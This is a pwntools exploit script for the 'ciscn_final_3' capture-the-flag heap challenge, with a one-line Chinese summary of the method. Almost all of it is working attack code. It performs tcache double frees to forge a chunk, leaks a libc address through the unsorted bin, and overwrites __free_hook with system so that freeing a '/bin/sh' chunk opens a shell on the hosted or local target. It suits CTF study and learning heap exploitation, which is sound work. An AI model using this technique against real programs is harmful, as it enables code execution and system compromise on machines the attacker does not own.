tcache机制的利用,通过unsorted泄露进而将堆空间开辟到libc中,写__free_hook拿到shell…
exp
from pwn import *
# 'debug' makes pwntools print the raw bytes exchanged with the target,
# which is what you want while working out the heap layout.
context.update(log_level='debug')
def pause_debug():
    """Log the target's PID(s) and block until the operator presses a key.

    Judging by the name this is a hook for attaching a debugger to the
    live process `p` (module global) before the next exploit step.
    """
    pids = proc.pidof(p)
    log.info(pids)
    pause()
def add(idx, size, content):
    """Drive menu option 1 (allocate) on the module-global process `p`.

    Answers the 'choice >', 'index' and 'size' prompts line by line, then
    sends `content` raw (no trailing newline) at the 'something' prompt, so
    the caller controls exactly which bytes land in the new chunk.
    """
    for prompt, value in (('choice >', 1), ('index', idx), ('size', size)):
        p.sendlineafter(prompt, str(value))
    p.sendafter('something', content)
def remove(idx):
    """Drive menu option 2 (free) for slot `idx` on the module-global `p`."""
    for prompt, value in (('choice >', 2), ('index', idx)):
        p.sendlineafter(prompt, str(value))
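proc_name = './ciscn_final_3'
# Default is a local process; `python3 exp.py REMOTE` targets the hosted instance.
p = remote('node3.buuoj.cn', 25285) if args.REMOTE else process(proc_name)
elf = ELF(proc_name)
libc = ELF('./libc-2.27.so')

# Offset of chunk 0's user pointer from the heap start, as observed for this
# binary; only used for the informational heap_base log line.
HEAP_CHUNK0_OFF = 0x11e70
# Offset, inside libc-2.27.so, of the main_arena pointer that the second
# 0x18 allocation below ends up leaking.
MAIN_ARENA_LEAK_OFF = 0x3ebca0


def recv_gift():
    """Return the pointer the program prints after 'gift :' as an int.

    recvn(14) blocks until exactly 14 bytes ('0x' + 12 hex digits) have
    arrived. The original recv(14) returns *up to* 14 bytes, so a reply that
    arrives fragmented (likely over the network) would be parsed as a
    truncated address. Like the original, this assumes a 12-digit address,
    which holds for PIE heap (0x55../0x56..) and libc (0x7f..) on x86-64.
    """
    p.recvuntil('gift :')
    return int(p.recvn(14), 16)


add(0, 0x78, b'a')  # get heap addr (chunk 0)
chunk0 = recv_gift()
heap_base = chunk0 - HEAP_CHUNK0_OFF
log.info(hex(heap_base))

add(1, 0x18, b'a')
for idx in range(2, 11):  # chunks 2..10, all 0x80-sized (0x78 request)
    add(idx, 0x78, b'a')

# tcache double free of chunk 10, then two allocations that return it and
# point its tcache `next` at chunk 0's header; the third allocation lands on
# that header.
# NOTE(review): both double frees in this script rely on the target libc
# having no tcache double-free detection (added upstream in glibc 2.29 and
# backported into some later 2.27 builds) -- confirm against libc-2.27.so.
remove(10)
remove(10)
fake_chunk = chunk0 - 0x10  # header address of chunk 0
add(11, 0x78, p64(fake_chunk))
add(12, 0x78, p64(fake_chunk))
# fake_chunk: new size for chunk 0. 0x4a0 = 0x80 (chunk 0) + 0x20 (chunk 1)
# + 8 * 0x80 (chunks 2..9), so the fake chunk ends exactly at chunk 10's
# header; the low bit is PREV_INUSE. Too large for tcache, so freeing it
# goes to the unsorted bin.
add(13, 0x78, p64(0) + p64(0x4a1))
remove(0)
# Original note here said "into unsorted bin"; a 0x20 chunk normally lands in
# tcache, so the unsorted-bin chunk is the 0x4a1 one freed just above --
# verify the layout in gdb if the leak below misbehaves.
remove(1)
add(14, 0x78, b'a')
add(14, 0x78, b'a')
add(15, 0x18, b'a')
add(16, 0x18, b'a')  # main_arena: this allocation's gift is the libc leak
# pause_debug()  # enable to attach gdb before reading the leak
libc_base = recv_gift() - MAIN_ARENA_LEAK_OFF
log.info(hex(libc_base))
# Fail fast on a bad leak: a libc base is page-aligned, so anything else
# means the heap layout did not come out as planned and every address
# computed below would be garbage.
if libc_base & 0xfff:
    log.error('libc leak looks wrong: base %#x is not page-aligned', libc_base)

# write __free_hook: tcache double free on a 0x70 chunk, point its `next` at
# __free_hook, then the third allocation returns __free_hook itself.
add(17, 0x68, b'a')
remove(17)
remove(17)
free_hook_addr = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
add(18, 0x68, p64(free_hook_addr))
add(19, 0x68, b'/bin/sh\x00')
add(20, 0x68, p64(system_addr))
remove(19)  # free("/bin/sh") should now dispatch through __free_hook
p.interactive()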